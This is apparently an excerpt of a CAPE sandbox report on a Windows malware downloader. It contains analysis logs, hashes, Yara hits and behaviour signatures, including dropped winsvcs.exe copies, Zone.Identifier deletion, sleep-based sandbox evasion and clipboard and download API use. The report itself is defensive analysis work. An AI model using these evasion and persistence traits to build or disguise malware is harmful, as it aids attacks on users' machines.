2019-01-10 03:40:44,171 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:40:44,280 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:40:44,405 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:40:44,515 [root] INFO: Disabling sleep skipping.
2019-01-10 03:40:44,562 [root] INFO: Monitor successfully loaded in process with pid 2612.
2019-01-10 03:40:44,936 [root] DEBUG: ProtectionHandler: Address: 0x59d9d0, RegionSize: 0x43d1
2019-01-10 03:40:44,951 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x59d9d0
2019-01-10 03:40:44,951 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x59d9d0, AllocationSize: 0x43d1, ThreadId: 0xa64
2019-01-10 03:40:44,951 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x59d9d0 and Type=0x0.
2019-01-10 03:40:44,951 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x59d9d0, size 0 with Callback 0x74492ea0, ThreadHandle = 0xac.
2019-01-10 03:40:44,951 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x59d9d0
2019-01-10 03:40:44,967 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x59d9d0
2019-01-10 03:40:44,967 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x59d9d0.
2019-01-10 03:40:44,967 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x570000, size 0x31da1).
2019-01-10 03:40:44,967 [root] DEBUG: DumpPEsInRange: Scanning range 0x570000 - 0x5a1da1.
2019-01-10 03:40:44,967 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x570000-0x5a1da1.
2019-01-10 03:40:44,983 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\chdswdpfa\CAPE\2612_98344401010412019
2019-01-10 03:40:44,997 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\2612_98344401010412019
2019-01-10 03:40:44,997 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x59d9d0 - 0x5a1da1.
2019-01-10 03:40:44,997 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x59d9d0.
2019-01-10 03:40:44,997 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x570000.
2019-01-10 03:40:44,997 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:40:44,997 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:40:45,013 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:40:45,013 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:40:45,013 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:40:45,013 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:40:45,013 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:40:45,029 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\2612_1445401010412019
2019-01-10 03:40:45,029 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:40:45,029 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:40:45,029 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:40:45,045 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:40:45,122 [root] INFO: Announced 32-bit process name: 1498839355.exe pid: 928
2019-01-10 03:40:45,122 [root] INFO: Added new process to list with pid: 928
2019-01-10 03:40:45,138 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:40:45,170 [lib.api.process] INFO: 32-bit DLL to inject is C:\chdswdpfa\dll\OwfFKZsM.dll, loader C:\chdswdpfa\bin\oXdzSeo.exe
2019-01-10 03:40:45,200 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 928
2019-01-10 03:40:45,247 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:40:45,279 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x1f0000
2019-01-10 03:40:45,309 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:40:45,357 [root] INFO: Disabling sleep skipping.
2019-01-10 03:40:45,388 [root] INFO: Monitor successfully loaded in process with pid 928.
2019-01-10 03:40:46,089 [root] INFO: Notified of termination of process with pid 2612.
2019-01-10 03:40:47,135 [root] INFO: Process with pid 2612 has terminated
2019-01-10 03:43:06,038 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-01-10 03:43:06,131 [root] INFO: Created shutdown mutex.
2019-01-10 03:43:07,270 [root] INFO: Setting terminate event for process 2908.
2019-01-10 03:43:07,973 [root] INFO: Setting terminate event for process 2128.
2019-01-10 03:43:08,628 [root] INFO: Setting terminate event for process 2744.
2019-01-10 03:43:09,188 [root] INFO: Setting terminate event for process 928.
2019-01-10 03:43:09,798 [root] INFO: Shutting down package.
2019-01-10 03:43:09,859 [root] INFO: Stopping auxiliary modules.
2019-01-10 03:43:09,953 [root] INFO: Finishing auxiliary modules.
2019-01-10 03:43:10,016 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-01-10 03:43:10,094 [root] INFO: Analysis completed.

MalScore

10.0

Malicious

Machine

Name Label Manager Started On Shutdown On
target-01 target-01 ESX 2019-01-10 03:39:36 2019-01-10 03:43:25

File Details

File Name 2019-01-08-malware-downloader.exe
File Size 152576 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 44a81be517e01ab33abdba541a239b6e
SHA1 2890c3be34e4189fe0a11b4e60ff2b3203fcdd2a
SHA256 056b7eb0c06645e1f51ed77f4fa18a4bed47135108371a84f0482f141ae0d769
SHA512 3361688b857d7e5db7fb5c9606a8e17c1487fb7e6dda9ed69d3c6c89ed94c51abb7e935971d35884bd71a8a55cc1bf436ea28997d404b50f91921895438515a0
CRC32 3328869D
Ssdeep 3072:MupWc+2g2yM2BSwgtNSGv551zDb/Wvn006luxHE:MupxMcBDSGlzDbuvn00c
TrID
  • 34.7% (.EXE) Win32 EXE PECompact compressed (generic) (41569/9/9)
  • 26.0% (.EXE) Win32 Executable MS Visual C++ (generic) (31206/45/13)
  • 23.1% (.EXE) Win64 Executable (generic) (27625/18/4)
  • 5.5% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 3.7% (.EXE) Win32 Executable (generic) (4508/7/1)
ClamAV None matched
Yara None matched
CAPE Yara None matched
Download Download ZIP Resubmit sample

Signatures

SetUnhandledExceptionFilter detected (possible anti-debug)
Behavioural detection: Executable code extraction
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 2952 trigged the Yara rule 'embedded_pe'
Hit: PID 2952 trigged the Yara rule 'shellcode'
Hit: PID 2908 trigged the Yara rule 'embedded_pe'
Hit: PID 2908 trigged the Yara rule 'shellcode'
Hit: PID 2776 trigged the Yara rule 'embedded_pe'
Hit: PID 2776 trigged the Yara rule 'shellcode'
Hit: PID 3068 trigged the Yara rule 'embedded_pe'
Hit: PID 3068 trigged the Yara rule 'shellcode'
Hit: PID 2936 trigged the Yara rule 'embedded_pe'
Hit: PID 2936 trigged the Yara rule 'shellcode'
Hit: PID 2744 trigged the Yara rule 'embedded_pe'
Hit: PID 2744 trigged the Yara rule 'shellcode'
Hit: PID 2612 trigged the Yara rule 'embedded_pe'
Hit: PID 2612 trigged the Yara rule 'shellcode'
Anomalous file deletion behavior detected (10+)
DeletedFile: C:\Users\user\AppData\Local\Temp\BdTTBslVE5X4r.exe:Zone.Identifier
DeletedFile: C:\Windows\495060393034060\winsvcs.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\3895820593.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\3180725230.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\3895820593.exe:Zone.Identifier
DeletedFile: C:\Windows\806084767800850\winsvcs.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\3971618177.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\3971618177.exe:Zone.Identifier
DeletedFile: C:\Windows\806084767800850\winsvcs.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\1015321578.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\1498839355.exe:Zone.Identifier
A process attempted to delay the analysis task.
Process: winsvcs.exe tried to sleep 901 seconds, actually delayed analysis time by 0 seconds
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: BdTTBslVE5X4r.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: winsvcs.exe/atexit
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: iphlpapi.DLL/GetAdaptersAddresses
DynamicLoader: DHCPCSVC.DLL/DhcpRequestParams
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: 3895820593.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: winsvcs.exe/atexit
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
